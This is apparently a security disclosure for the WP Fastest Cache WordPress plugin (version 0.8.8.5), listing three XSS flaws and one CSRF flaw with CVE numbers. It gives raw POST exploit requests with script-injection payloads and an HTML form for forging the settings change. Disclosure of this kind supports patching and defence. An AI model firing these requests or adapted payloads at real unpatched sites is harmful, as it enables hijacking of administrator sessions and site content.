Tested Version: 0.8.8.5
Discovered Date: September 26 2018
Fixed Version: 0.8.8.6
Fixed Date: October 9 2018
Active installations:700,000+
#1 - CVE-2018-17585 - XSS → wpFastestCachePage options
Locate → http://localhost/wordpress/wp-admin/admin.php?page=wpfastestcacheoptions
Affected Vectors:
wpFastestCachePreload_number
wpFastestCacheLanguage
Exploit Request:
POST /wordpress/wp-admin/admin.php?page=wpfastestcacheoptions HTTP/1.1
wpFastestCachePreload_number=4<script>alert(1);</script>
wpFastestCacheLanguage=eng"><script>alert(2);</script>
#2 - CVE-2018-17586 - XSS - action → wpfc_save_timeout_pages
Affected Vectors:
rules[0][content]
Exploit Request:
POST /wordpress498/wp-admin/admin-ajax.php HTTP/1.1
rules%5B0%5D%5Bcontent%5D=%22%3E%3Cscript%3Ealert(3)%3B%3C%2Fscript%3E
#3 - CVE-2018-17583 - XSS - action → wpfc_save_exclude_pages
Affected Vectors:
rules[0][content]
Exploit Request:
POST /wordpress498/wp-admin/admin-ajax.php HTTP/1.1
rules%5B0%5D%5Bcontent%5D=%22%3E%3Cscript%3Ealert(4)%3B%3C%2Fscript%3E
#4 - CVE-2018-17584 - CSRF in page → wpfastestcacheoptions
Create *.html file
<form method="POST" action="http://localhost/wordpress/wp-admin/admin.php?page=wpfastestcacheoptions">
<input type="text" name="wpFastestCachePage" value="options"><br />
<input type="text" name="wpFastestCachePreload_number" value="Enter the payload"><br />
<input type="text" name="wpFastestCacheLanguage" value="engEnter the payload"><br />
<input type="text" name="submit" value="Save Changes"><br />
<input type="submit">
</form>
Payload: "><script>alert(1);</script>